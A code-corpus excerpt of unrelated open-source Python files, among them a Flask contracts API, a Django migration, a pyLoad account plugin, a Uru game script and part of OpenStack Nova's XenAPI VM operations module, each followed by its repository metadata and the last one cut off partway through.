| 20,304
| 0.006403
|
from setuptools import setup
version = '0.4'
setup(
name = 'django-cache-decorator',
packages = ['django_cache_decorator'],
license = 'MIT',
version = version,
description = 'Easily add caching to functions within a django project.',
long_description=open('README.md').read(),
author = 'Richard Caceres',
author_email = 'me@rchrd.net',
url = 'https://github.com/rchrd2/django-cache-decorator/',
download_url = 'https://github.com/rchrd2/django-cache-decorator/tarball/' + version,
keywords = ['django','caching','decorator'],
classifiers = [],
)
|
rchrd2/django-cache-decorator
|
setup.py
|
Python
|
mit
| 596
| 0.041946
|
# -*- coding: utf-8 -*-
import os
import json
from sqlalchemy import and_, extract, func, desc
from datetime import datetime
from jinja2 import TemplateNotFound
from flask import Blueprint, render_template, send_from_directory, abort, request
from flask.ext.paginate import Pagination
from flask.ext import restful
from flask.ext.restful import fields
from flask.ext.restful.reqparse import RequestParser
from .models import Contrato
from gastosabertos.extensions import db
# Blueprint for Contrato
contratos = Blueprint('contratos', __name__,
template_folder='templates',
static_folder='static',
static_url_path='/contrato/static')
# Create the restful API
contratos_api = restful.Api(contratos, prefix="/api/v1")
# receita_api.decorators = [cors.crossdomain(origin='*')]
# class Date(fields.Raw):
# def format(self, value):
# return str(value)
# Parser for RevenueAPI arguments
contratos_list_parser = RequestParser()
contratos_list_parser.add_argument('cnpj')
contratos_list_parser.add_argument('orgao')
contratos_list_parser.add_argument('modalidade')
contratos_list_parser.add_argument('evento')
contratos_list_parser.add_argument('objeto')
contratos_list_parser.add_argument('processo_administrativo')
contratos_list_parser.add_argument('nome_fornecedor')
contratos_list_parser.add_argument('licitacao')
contratos_list_parser.add_argument('group_by', default='')
contratos_list_parser.add_argument('order_by', 'id')
contratos_list_parser.add_argument('page', type=int, default=0)
contratos_list_parser.add_argument('per_page_num', type=int, default=100)
# Fields for ContratoAPI data marshal
contratos_fields = { 'id': fields.Integer()
, 'orgao': fields.String()
, 'data_assinatura': fields.DateTime(dt_format='iso8601')
, 'vigencia': fields.Integer()
, 'objeto': fields.String()
, 'modalidade': fields.String()
, 'evento': fields.String()
, 'processo_administrativo': fields.String()
, 'cnpj': fields.String()
, 'nome_fornecedor': fields.String()
, 'valor': fields.Float()
, 'licitacao': fields.String()
, 'data_publicacao': fields.DateTime(dt_format='iso8601') }
class ContratoApi(restful.Resource):
def filter(self, contratos_data):
# Extract the arguments in GET request
args = contratos_list_parser.parse_args()
cnpj = args['cnpj']
nome_fornecedor = args['nome_fornecedor']
orgao = args['orgao']
modalidade = args['modalidade']
evento = args['evento']
objeto = args['objeto']
processo_administrativo = args['processo_administrativo']
licitacao = args['licitacao']
if cnpj:
contratos_data = contratos_data.filter(Contrato.cnpj == cnpj)
if nome_fornecedor:
nome_query = u'%{}%'.format(nome_fornecedor)
contratos_data = contratos_data.filter(Contrato.nome_fornecedor.ilike(nome_query))
if orgao:
orgao_query = u'%{}%'.format(orgao)
contratos_data = contratos_data.filter(Contrato.orgao.ilike(orgao_query))
if modalidade:
modalidade_query = u'%{}%'.format(modalidade)
contratos_data = contratos_data.filter(Contrato.modalidade.ilike(modalidade_query))
if evento:
evento_query = u'%{}%'.format(evento)
contratos_data = contratos_data.filter(Contrato.evento.ilike(evento_query))
if objeto:
objeto_query = u'%{}%'.format(objeto)
contratos_data = contratos_data.filter(Contrato.objeto.ilike(objeto_query))
if processo_administrativo:
processo_administrativo_query = u'%{}%'.format(processo_administrativo)
contratos_data = contratos_data.filter(Contrato.processo_administrativo.ilike(processo_administrativo_query))
if licitacao:
licitacao_query = u'%{}%'.format(licitacao)
contratos_data = contratos_data.filter(Contrato.licitacao.ilike(licitacao_query))
return contratos_data
def order(self, contratos_data):
args = contratos_list_parser.parse_args()
order_by = args['order_by'].split(',')
if order_by:
order_by_args = []
for field_name in order_by:
desc_ = False
if field_name.startswith('-'):
field_name = field_name[1:]
desc_ = True
if field_name in contratos_fields or field_name == 'count':
order_by_arg = field_name
if desc_:
order_by_arg = desc(order_by_arg)
order_by_args.append(order_by_arg)
contratos_data = contratos_data.order_by(*order_by_args)
return contratos_data
def paginate(self, contratos_data):
args = contratos_list_parser.parse_args()
page = args['page']
per_page_num = args['per_page_num']
        # Limit the number of results per page
contratos_data = contratos_data.offset(page*per_page_num).limit(per_page_num)
return contratos_data
class ContratoListApi(ContratoApi):
@restful.marshal_with(contratos_fields)
def get(self):
contratos_data = db.session.query(Contrato)
contratos_data = self.order(contratos_data)
contratos_data = self.filter(contratos_data)
headers = {
            # Adding the 'Access-Control-Expose-Headers' header here is a workaround
            # until Flask-Restful adds support for it.
'Access-Control-Expose-Headers': 'X-Total-Count',
'X-Total-Count': contratos_data.count()
}
contratos_data = self.paginate(contratos_data)
return contratos_data.all(), 200, headers
contratos_api.add_resource(ContratoListApi, '/contrato/list')
class ContratoAggregateApi(ContratoApi):
def get(self):
args = contratos_list_parser.parse_args()
group_by = args['group_by'].split(',')
group_by_fields = []
# Always return a count
query_args = [func.count(Contrato.id).label('count')]
keys = []
temporary_keys = []
partial_fields = []
# Tuples with SQLAlchemy function and args to get parts of values.
        # This allows grouping by year or month, for example.
parts = {
'year': (lambda field: [func.extract('year', field)],
lambda values: list(values)[0]),
'month': (lambda field: [func.extract('year', field), func.extract('month', field)],
lambda values: '-'.join([format(v, '02') for v in values])),
'day': (lambda field: [func.extract('year', field), func.extract('month', field), func.extract('day', field)],
lambda values: '-'.join([format(v, '02') for v in values])),
}
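        # Illustrative sketch (the query below is an assumption, not taken from the code): a request like
        #     GET /api/v1/contrato/aggregate?group_by=data_publicacao__year,modalidade
        # splits 'data_publicacao__year' into field_name='data_publicacao' and part='year',
        # groups by extract('year', data_publicacao) together with modalidade, and returns one
        # row per (year, modalidade) pair with its count and summed valor.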
for field_name in group_by:
part = None
if field_name.endswith(tuple(map(lambda a: '__{}'.format(a), parts.keys()))):
# User asked to group using only part of value.
# Get the original field name and which part we should use.
# "?group_by=data_publicacao__year" results in
# field_name = 'data_publicacao'
# part = 'year'
field_name, part = field_name.split('__', 1)
if field_name in contratos_fields:
group_by_field = [getattr(Contrato, field_name)]
if part:
# Apply the "part" function
group_by_field = parts[part][0](group_by_field[0])
temporary_keys.extend(['{}__{}'.format(field_name, i) for i in range(len(group_by_field))])
partial_fields.append({
'field_name': field_name,
'count': len(group_by_field),
'part_name': part,
})
else:
keys.append(field_name)
temporary_keys.append(field_name)
group_by_fields.extend(group_by_field)
query_args.extend(group_by_field)
query_args.append(func.sum(Contrato.valor).label('valor'))
keys.append('valor')
temporary_keys.append('valor')
contratos_data = db.session.query(*query_args)
if group_by_fields:
contratos_data = contratos_data.group_by(*group_by_fields)
contratos_data = self.order(contratos_data)
contratos_data = self.filter(contratos_data)
headers = {
            # Adding the 'Access-Control-Expose-Headers' header here is a workaround
            # until Flask-Restful adds support for it.
'Access-Control-Expose-Headers': 'X-Total-Count',
'X-Total-Count': contratos_data.count()
}
contratos_data = self.paginate(contratos_data)
# Create the dictionary used to marshal
fields_ = {'count': fields.Integer()}
fields_.update({key: contratos_fields.get(key, fields.String()) for key in keys})
# Create a list of dictionaries
result = map(lambda a: dict(zip(['count'] + temporary_keys, a)), contratos_data.all())
# Set partial dates type to string
for f in partial_fields:
fields_[f['field_name']] = fields.String()
for item in result:
item[f['field_name']] = parts[f['part_name']][1]((item.pop('{}__{}'.format(f['field_name'], i)) for i in range(f['count'])))
return restful.marshal(result, fields_), 200, headers
contratos_api.add_resource(ContratoAggregateApi, '/contrato/aggregate')
@contratos.route('/contrato/<contract_id>')
def show_contract(contract_id):
try:
contrato = db.session.query(Contrato).filter(Contrato.numero == contract_id).one()
return render_template('contrato.html', contrato=contrato)
except TemplateNotFound:
abort(404)
@contratos.route('/contrato/cnpj/<cnpj>')
def contracts_for_cnpj(cnpj):
cnpj = "{}.{}.{}/{}-{}".format( cnpj[0:2], cnpj[2:5], cnpj[5:8], cnpj[8:12], cnpj[12:14])
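    # Illustrative example (hypothetical value): a path segment "12345678000195" becomes "12.345.678/0001-95"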
# contratos = db.session.query(Contrato).filter(Contrato.cnpj == cnpj).all()
page = int(request.args.get('page', 1))
per_page_num = 10
try:
contratos_query = db.session.query(Contrato).filter(Contrato.cnpj == cnpj)
contratos = contratos_query.offset((page-1)*per_page_num).limit(per_page_num).all()
count = contratos_query.count()
pagination = Pagination(page=page, per_page=per_page_num, total=count, found=count, bs_version=3, search=True, record_name='contratos')
return render_template('contratos-cnpj.html', contratos=contratos, pagination=pagination, count=count, filter_info=u"Fornecedor", filter_value=cnpj)
except TemplateNotFound:
abort(404)
@contratos.route('/contrato/orgao/<orgao>')
def contracts_for_orgao(orgao):
page = int(request.args.get('page', 1))
per_page_num = 10
try:
contratos_query = db.session.query(Contrato).filter(Contrato.orgao == orgao)
contratos = contratos_query.offset((page-1)*per_page_num).limit(per_page_num).all()
count = contratos_query.count()
pagination = Pagination(page=page, per_page=per_page_num, total=count, found=count, bs_version=3, search=True, record_name='contratos')
return render_template('contratos-orgao.html', contratos=contratos, pagination=pagination, count=count, filter_info=u"Orgão", filter_value=orgao)
except TemplateNotFound:
abort(404)
@contratos.route('/contrato/modalidade/<modalidade>')
def contracts_for_modalidade(modalidade):
page = int(request.args.get('page', 1))
per_page_num = 10
try:
contratos_query = db.session.query(Contrato).filter(Contrato.modalidade == modalidade)
contratos = contratos_query.offset((page-1)*per_page_num).limit(per_page_num).all()
count = contratos_query.count()
pagination = Pagination(page=page, per_page=per_page_num, total=count, found=count, bs_version=3, search=True, record_name='contratos')
return render_template('contratos-orgao.html', contratos=contratos, pagination=pagination, count=count, filter_info="Modalidade", filter_value=modalidade)
except TemplateNotFound:
abort(404)
@contratos.route('/contrato/evento/<evento>')
def contracts_for_evento(evento):
page = int(request.args.get('page', 1))
per_page_num = 10
try:
contratos_query = db.session.query(Contrato).filter(Contrato.evento == evento)
contratos = contratos_query.offset((page-1)*per_page_num).limit(per_page_num).all()
count = contratos_query.count()
pagination = Pagination(page=page, per_page=per_page_num, total=count, found=count, bs_version=3, search=True, record_name='contratos')
return render_template('contratos-orgao.html', contratos=contratos, pagination=pagination, count=count, filter_info="Evento", filter_value=evento)
except TemplateNotFound:
abort(404)
@contratos.route('/contratos')
def all_contracts():
page = int(request.args.get('page', 1))
per_page_num = 40
try:
contratos = db.session.query(Contrato).offset((page-1)*per_page_num).limit(per_page_num).all()
count = db.session.query(Contrato).count()
pagination = Pagination(page=page, per_page=per_page_num, total=count, found=count, bs_version=3, search=True, record_name='contratos')
return render_template('todos-contratos.html', contratos=contratos, pagination=pagination, count=count)
except TemplateNotFound:
abort(404)
|
LuizArmesto/gastos_abertos
|
gastosabertos/contratos/views.py
|
Python
|
agpl-3.0
| 13,828
| 0.005496
|
# Copyright (c) 2011 CSIRO
# Australia Telescope National Facility (ATNF)
# Commonwealth Scientific and Industrial Research Organisation (CSIRO)
# PO Box 76, Epping NSW 1710, Australia
# atnf-enquiries@csiro.au
#
# This file is part of the ASKAP software distribution.
#
# The ASKAP software distribution is free software: you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the License
# or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
#
|
ATNF/askapsdp
|
Code/Base/py-accessor/current/askap/accessors/__init__.py
|
Python
|
gpl-2.0
| 991
| 0
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-09 13:44
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0002_tablefield_allow_null'),
]
operations = [
migrations.AddField(
model_name='tablefield',
name='inner_type',
field=models.CharField(default='', max_length=250),
),
]
|
lealhugui/schema-analyser
|
app/server/api/migrations/0003_tablefield_inner_type.py
|
Python
|
mit
| 467
| 0
|
# -*- coding: utf-8 -*-
from module.plugins.internal.XFSPAccount import XFSPAccount
class RyushareCom(XFSPAccount):
__name__ = "RyushareCom"
__version__ = "0.03"
__type__ = "account"
__description__ = """ryushare.com account plugin"""
__author_name__ = ("zoidberg", "trance4us")
__author_mail__ = ("zoidberg@mujmail.cz", "")
MAIN_PAGE = "http://ryushare.com/"
def login(self, user, data, req):
req.lastURL = "http://ryushare.com/login.python"
html = req.load("http://ryushare.com/login.python",
post={"login": user, "password": data["password"], "op": "login"})
if 'Incorrect Login or Password' in html or '>Error<' in html:
self.wrongPassword()
|
chaosmaker/pyload
|
module/plugins/accounts/RyushareCom.py
|
Python
|
gpl-3.0
| 742
| 0.001348
|
from numpy import matrix, zeros
# integer Size; integer nPQ; matrix G; matrix B; array U (complex bus voltages)
def JacMat(Size, nPQ, G, B, U):
    # Helpers computing every entry of the Jacobian matrix
    f = U.real
    e = U.imag
    JacMat = zeros((Size, Size))
    def Hij(B, G, e, f):
        return -B*e + G*f
    def Nij(B, G, e, f):
        return G*e + B*f
    def Jij(B, G, e, f):
        return -B*f - G*e
    def Lij(B, G, e, f):
        return -B*e + G*f
    def Rij():
        return 0
    def Sij():
        return 0
    def Aii(GM, BM, eA, fA, i):
        aii = 0
        for j in range(1, len(eA)):
            aii = aii + GM[i][j]*eA[j] - BM[i][j]*fA[j]
        return aii
    def Bii(GM, BM, eA, fA, i):
        bii = 0
        for j in range(1, len(eA)):
            bii = bii + GM[i][j]*fA[j] + BM[i][j]*eA[j]
        return bii
    # NOTE: the diagonal helpers Hii, Nii, Jii, Lii, Rii and Sii used below are
    # not defined in this file; Aii and Bii above look like the intended
    # building blocks for them.
    # Both admittance matrices must be square and of equal size.
    if G.shape[0] == G.shape[1] and B.shape == G.shape:
        # Build the Jacobian matrix
for m in range(0, Size, 2): #H
for n in range(0, Size, 2):
if m==n:
JacMat[m][n] = Hii(B[m][m], G[m][m], e[m], f[m])
else:
JacMat[m][n] = Hij(B[m][n], G[m][n], e[m], f[m])
for m in range(0, Size, 2): #N
for n in range(1, Size, 2):
if m==n:
JacMat[m][n] = Nii(B[m][m], G[m][m], e[m], f[m])
else:
JacMat[m][n] = Nij(B[m][n], G[m][n], e[m], f[m])
for m in range(1, Size, 2): #J
for n in range(0, nPQ*2, 2):
if m==n:
JacMat[m][n] = Jii(B[m][m], G[m][m], e[m], f[m])
else:
JacMat[m][n] = Jij(B[m][n], G[m][n], e[m], f[m])
for m in range(1, Size, 2): #L
for n in range(1, nPQ*2, 2):
if m==n:
JacMat[m][n] = Lii(B[m][m], G[m][m], e[m], f[m])
else:
JacMat[m][n] = Lij(B[m][n], G[m][n], e[m], f[m])
for m in range(1, Size, 2): #R
for n in range(1, nPQ*2, 2):
if m==n:
JacMat[m][n] = Rii(f[m])
else:
JacMat[m][n] = Rij()
for m in range(1, Size, 2): #S
for n in range(nPQ*2+1, Size, 2):
if m==n:
JacMat[m][n] = Sii(e[m])
else:
JacMat[m][n] = Sij()
print JacMat
return JacMat
else:
print "Parameter Unmatched"
return False
|
bitmingw/hexomega
|
assets/HOJacMat.py
|
Python
|
mit
| 2,566
| 0.011302
|
"""
WSGI config for batfinancas project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "batfinancas.settings")
application = get_wsgi_application()
|
rafaelnsantos/batfinancas
|
batfinancas/wsgi.py
|
Python
|
mit
| 399
| 0
|
# -*- coding: utf-8 -*-
""" *==LICENSE==*
CyanWorlds.com Engine - MMOG client, server and tools
Copyright (C) 2011 Cyan Worlds, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Additional permissions under GNU GPL version 3 section 7
If you modify this Program, or any covered work, by linking or
combining it with any of RAD Game Tools Bink SDK, Autodesk 3ds Max SDK,
NVIDIA PhysX SDK, Microsoft DirectX SDK, OpenSSL library, Independent
JPEG Group JPEG library, Microsoft Windows Media SDK, or Apple QuickTime SDK
(or a modified version of those libraries),
containing parts covered by the terms of the Bink SDK EULA, 3ds Max EULA,
PhysX SDK EULA, DirectX SDK EULA, OpenSSL and SSLeay licenses, IJG
JPEG Library README, Windows Media SDK EULA, or QuickTime SDK EULA, the
licensors of this Program grant you additional
permission to convey the resulting work. Corresponding Source for a
non-source form of such a combination shall include the source code for
the parts of OpenSSL and IJG JPEG Library used as well as that of the covered
work.
You can contact Cyan Worlds, Inc. by email legal@cyan.com
or by snail mail at:
Cyan Worlds, Inc.
14617 N Newport Hwy
Mead, WA 99021
*==LICENSE==* """
"""
Module: xPodBahroSymbol
Age: Global
Date: January 2007
Author: Derek Odell
"""
from Plasma import *
from PlasmaTypes import *
import random
# define the attributes that will be entered in max
respBahroSymbol = ptAttribResponder(1, "resp: Bahro Symbol", ["beginning","middle","end"], netForce=1)
SymbolAppears = ptAttribInt(2, "Frame the Symbol Appears", 226, (0,5000))
DayFrameSize = ptAttribInt(3, "Frames in One Day", 2000, (0,5000))
animMasterDayLight = ptAttribAnimation(4, "Master Animation Object")
respSFX = ptAttribResponder(5, "resp: Symbol SFX", ["stop","play"],netForce = 1)
# define globals
kDayLengthInSeconds = 56585.0
# The max file "full day" animation in Payiferen is 2000 frames
# or 66.666 (2000 / 30) seconds long. We need it to last 56585
# seconds which means the animation needs to be played back at
# 0.035345 (2000 / 56585) frames per second. Which means animation
# speed needs to be set to 0.0011781666 ((2000 / 56585) / 30)
kDayAnimationSpeed = (DayFrameSize.value / kDayLengthInSeconds) / 30.0
# The Bahro symbol is set to trigger on frame 226 of 2000 which
# is 11.3% (226 / 2000) into the day. 11.3% into a 56585 second
# day is 6394.105 seconds (56585 * 0.113). That gives us our base
# point for every other age that needs the Bahro symbol.
kTimeWhenSymbolAppears = kDayLengthInSeconds * (float(SymbolAppears.value) / float(DayFrameSize.value))
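# Worked check of the figures above (illustrative, using the default attribute
# values): kDayAnimationSpeed = (2000 / 56585.0) / 30.0 ~= 0.0011782 and
# kTimeWhenSymbolAppears = 56585.0 * (226.0 / 2000.0) ~= 6394.1 seconds.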
#====================================
class xPodBahroSymbol(ptResponder):
###########################
def __init__(self):
ptResponder.__init__(self)
self.id = 5240
version = 1
self.version = version
print "__init__xPodBahroSymbol v.", version,".0"
random.seed()
###########################
def OnServerInitComplete(self):
self.ISetTimers()
respSFX.run(self.key, state="stop")
if type(animMasterDayLight.value) != type(None):
timeIntoMasterAnim = PtGetAgeTimeOfDayPercent() * (DayFrameSize.value / 30.0)
print "xPodBahroSymbol.OnServerInitComplete: Master anim is skipping to %f seconds and playing at %f speed" % (timeIntoMasterAnim, kDayAnimationSpeed)
animMasterDayLight.animation.skipToTime(timeIntoMasterAnim)
animMasterDayLight.animation.speed(kDayAnimationSpeed)
animMasterDayLight.animation.resume()
###########################
def OnNotify(self,state,id,events):
print "xPodBahroSymbol.OnNotify: state=%f id=%d events=" % (state,id),events
if id == respBahroSymbol.id:
PtAtTimeCallback(self.key, 32, 3)
###########################
def OnTimer(self,TimerID):
print "xPodBahroSymbol.OnTimer: callback id=%d" % (TimerID)
if self.sceneobject.isLocallyOwned():
if TimerID == 1:
respBahroSymbol.run(self.key, state="beginning")
respSFX.run(self.key, state="play")
elif TimerID == 2:
self.ISetTimers()
elif TimerID == 3:
respBahroSymbol.run(self.key, state="end")
respSFX.run(self.key, state="stop")
###########################
def ISetTimers(self):
beginningOfToday = PtGetDniTime() - int(PtGetAgeTimeOfDayPercent() * kDayLengthInSeconds)
timeWhenSymbolAppearsToday = beginningOfToday + kTimeWhenSymbolAppears
if timeWhenSymbolAppearsToday > PtGetDniTime():
timeTillSymbolAppears = timeWhenSymbolAppearsToday - PtGetDniTime()
PtAtTimeCallback(self.key, timeTillSymbolAppears, 1)
print "xGlobalDoor.key: %d%s" % (random.randint(0,100), hex(int(timeTillSymbolAppears + 1234)))
else:
print "xPodBahroSymbol: You missed the symbol for today."
timeLeftToday = kDayLengthInSeconds - int(PtGetAgeTimeOfDayPercent() * kDayLengthInSeconds)
timeLeftToday += 1 # because we want it to go off right AFTER the day flips
PtAtTimeCallback(self.key, timeLeftToday, 2)
print "xPodBahroSymbol: Tomorrow starts in %d seconds" % (timeLeftToday)
###########################
def OnBackdoorMsg(self, target, param):
if target == "bahro":
if self.sceneobject.isLocallyOwned():
print "xPodBahroSymbol.OnBackdoorMsg: Work!"
if param == "appear":
PtAtTimeCallback(self.key, 1, 1)
|
zrax/moul-scripts
|
Python/xPodBahroSymbol.py
|
Python
|
gpl-3.0
| 6,228
| 0.006744
|
#!/bin/env python
import npyscreen
class MainFm(npyscreen.Form):
def create(self):
self.mb = self.add(npyscreen.MonthBox,
use_datetime = True)
class TestApp(npyscreen.NPSAppManaged):
def onStart(self):
self.addForm("MAIN", MainFm)
if __name__ == "__main__":
A = TestApp()
A.run()
|
tescalada/npyscreen-restructure
|
tests/testMonthbox.py
|
Python
|
bsd-2-clause
| 337
| 0.011869
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright 2010 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Management class for VM-related functions (spawn, reboot, etc).
"""
import functools
import itertools
import time
from eventlet import greenthread
import netaddr
from oslo.config import cfg
from nova import block_device
from nova.compute import api as compute
from nova.compute import flavors
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import vm_mode
from nova.compute import vm_states
from nova import context as nova_context
from nova import exception
from nova.image import glance
from nova.openstack.common import excutils
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
from nova import utils
from nova.virt import configdrive
from nova.virt import driver as virt_driver
from nova.virt import firewall
from nova.virt.xenapi import agent as xapi_agent
from nova.virt.xenapi import pool_states
from nova.virt.xenapi import vm_utils
from nova.virt.xenapi import volume_utils
from nova.virt.xenapi import volumeops
LOG = logging.getLogger(__name__)
xenapi_vmops_opts = [
cfg.IntOpt('xenapi_running_timeout',
default=60,
help='number of seconds to wait for instance '
'to go to running state'),
cfg.StrOpt('xenapi_vif_driver',
default='nova.virt.xenapi.vif.XenAPIBridgeDriver',
help='The XenAPI VIF driver using XenServer Network APIs.'),
cfg.StrOpt('xenapi_image_upload_handler',
default='nova.virt.xenapi.imageupload.glance.GlanceStore',
help='Object Store Driver used to handle image uploads.'),
cfg.BoolOpt('xenapi_generate_swap',
default=False,
help='Whether to generate swap '
'(False means fetching it from OVA)'),
cfg.StrOpt('image_activation_file',
default=None,
help=_('JSON file containing image activation configuration')),
cfg.StrOpt('provider',
default='Rackspace',
help=_('Set the provider name. Defaults to "Rackspace".')),
cfg.StrOpt('region',
default=None,
help=_('Region compute host is in')),
cfg.StrOpt('ip_whitelist_file',
default=None,
help=_('File containing a list of IP addresses to whitelist '
'on managed hosts')),
cfg.StrOpt('max_snapshot_size',
default=0,
help=_('Maximum allowed number of bytes (before compression)'
' that may be uploaded during an instance snapshot.'
' A value of zero means there is no limit.')),
]
CONF = cfg.CONF
CONF.register_opts(xenapi_vmops_opts)
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('vncserver_proxyclient_address', 'nova.vnc')
DEFAULT_FIREWALL_DRIVER = "%s.%s" % (
firewall.__name__,
firewall.IptablesFirewallDriver.__name__)
RESIZE_TOTAL_STEPS = 5
DEVICE_ROOT = '0'
DEVICE_RESCUE = '1'
DEVICE_SWAP = '2'
DEVICE_CONFIGDRIVE = '3'
# Note(johngarbutt) HVM guests only support four devices
# until the PV tools activate, when others become available
# As such, ephemeral disk only available once PV tools load
DEVICE_EPHEMERAL = '4'
# Note(johngarbutt) Currently don't support ISO boot during rescue
# and we must have the ISO visible before the PV drivers start
DEVICE_CD = '1'
class RaxImageActivationConfig(object):
"""Manage RAX image license activation config state."""
def __init__(self):
self._cache = {}
if CONF.image_activation_file:
self._file_path = CONF.find_file(CONF.image_activation_file)
self.reload()
def reload(self):
"""(Re)load config from JSON file
        The file is a dict mapping each activation profile id to
a configuration value.
E.x. file:
{
"1-2-3-4-5": "useful_config_value"
}
"""
def _reload(data):
self._config = jsonutils.loads(data)
utils.read_cached_file(self._file_path, self._cache,
reload_func=_reload)
def get(self, profile_name):
"""Get config values for the given profile name."""
if not CONF.image_activation_file:
return None
self.reload()
return self._config.get(profile_name)
def cmp_version(a, b):
"""Compare two version strings (eg 0.0.1.10 > 0.0.1.9)."""
a = a.split('.')
b = b.split('.')
# Compare each individual portion of both version strings
for va, vb in zip(a, b):
ret = int(va) - int(vb)
if ret:
return ret
# Fallback to comparing length last
return len(a) - len(b)
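# For example (illustrative): cmp_version('1.2.10', '1.2.9') is positive,
# cmp_version('1.2', '1.2.0') is negative because ties fall back to comparing
# length, and cmp_version('1.2.3', '1.2.3') is 0.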
def make_step_decorator(context, instance, instance_update):
"""Factory to create a decorator that records instance progress as a series
of discrete steps.
Each time the decorator is invoked we bump the total-step-count, so after::
@step
def step1():
...
@step
def step2():
...
we have a total-step-count of 2.
Each time the step-function (not the step-decorator!) is invoked, we bump
the current-step-count by 1, so after::
step1()
the current-step-count would be 1 giving a progress of ``1 / 2 *
100`` or 50%.
"""
step_info = dict(total=0, current=0)
def bump_progress():
step_info['current'] += 1
progress = round(float(step_info['current']) /
step_info['total'] * 100)
LOG.debug(_("Updating progress to %(progress)d"), locals(),
instance=instance)
instance_update(context, instance['uuid'], {'progress': progress})
def step_decorator(f):
step_info['total'] += 1
@functools.wraps(f)
def inner(*args, **kwargs):
rv = f(*args, **kwargs)
bump_progress()
return rv
return inner
return step_decorator
class VMOps(object):
"""
Management class for VM-related tasks
"""
def __init__(self, session, virtapi):
self.compute_api = compute.API()
self._session = session
self._virtapi = virtapi
self._volumeops = volumeops.VolumeOps(self._session)
self.firewall_driver = firewall.load_driver(
DEFAULT_FIREWALL_DRIVER,
self._virtapi,
xenapi_session=self._session)
vif_impl = importutils.import_class(CONF.xenapi_vif_driver)
self.vif_driver = vif_impl(xenapi_session=self._session)
self.default_root_dev = '/dev/sda'
# configs for image license activation:
self._rax_image_activation_config = RaxImageActivationConfig()
msg = _("Importing image upload handler: %s")
LOG.debug(msg % CONF.xenapi_image_upload_handler)
self.image_upload_handler = importutils.import_object(
CONF.xenapi_image_upload_handler)
@property
def agent_enabled(self):
return not CONF.xenapi_disable_agent
def _get_agent(self, instance, vm_ref):
if self.agent_enabled:
return xapi_agent.XenAPIBasedAgent(self._session, self._virtapi,
instance, vm_ref)
raise exception.NovaException(_("Error: Agent is disabled"))
def list_instances(self):
"""List VM instances."""
# TODO(justinsb): Should we just always use the details method?
# Seems to be the same number of API calls..
name_labels = []
for vm_ref, vm_rec in vm_utils.list_vms(self._session):
name_labels.append(vm_rec["name_label"])
return name_labels
def list_instance_uuids(self):
"""Get the list of nova instance uuids for VMs found on the
hypervisor.
"""
nova_uuids = []
for vm_ref, vm_rec in vm_utils.list_vms(self._session):
other_config = vm_rec['other_config']
nova_uuid = other_config.get('nova_uuid')
if nova_uuid:
nova_uuids.append(nova_uuid)
return nova_uuids
def confirm_migration(self, migration, instance, network_info):
self._destroy_orig_vm(instance, network_info)
def _destroy_orig_vm(self, instance, network_info):
name_label = self._get_orig_vm_name_label(instance)
vm_ref = vm_utils.lookup(self._session, name_label)
return self._destroy(instance, vm_ref, network_info=network_info)
def _attach_mapped_block_devices(self, instance, block_device_info):
# We are attaching these volumes before start (no hotplugging)
# because some guests (windows) don't load PV drivers quickly
block_device_mapping = virt_driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
mount_device = vol['mount_device'].rpartition("/")[2]
self._volumeops.attach_volume(connection_info,
instance['name'],
mount_device,
hotplug=False)
def finish_revert_migration(self, instance, block_device_info=None):
self._restore_orig_vm_and_cleanup_orphan(instance, block_device_info)
def _restore_orig_vm_and_cleanup_orphan(self, instance, block_device_info):
# NOTE(sirp): the original vm was suffixed with '-orig'; find it using
# the old suffix, remove the suffix, then power it back on.
name_label = self._get_orig_vm_name_label(instance)
vm_ref = vm_utils.lookup(self._session, name_label)
# NOTE(danms): if we're reverting migration in the failure case,
# make sure we don't have a conflicting vm still running here,
# as might be the case in a failed migrate-to-same-host situation
new_ref = vm_utils.lookup(self._session, instance['name'])
if vm_ref is not None:
if new_ref is not None:
self._destroy(instance, new_ref)
# Remove the '-orig' suffix (which was added in case the
# resized VM ends up on the source host, common during
# testing)
name_label = instance['name']
vm_utils.set_vm_name_label(self._session, vm_ref, name_label)
self._attach_mapped_block_devices(instance, block_device_info)
elif new_ref is not None:
# We crashed before the -orig backup was made
vm_ref = new_ref
self._start(instance, vm_ref)
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None):
root_vdi = vm_utils.move_disks(self._session, instance, disk_info)
if resize_instance:
self._resize_instance(instance, root_vdi)
# Check if kernel and ramdisk are external
kernel_file = None
ramdisk_file = None
name_label = instance['name']
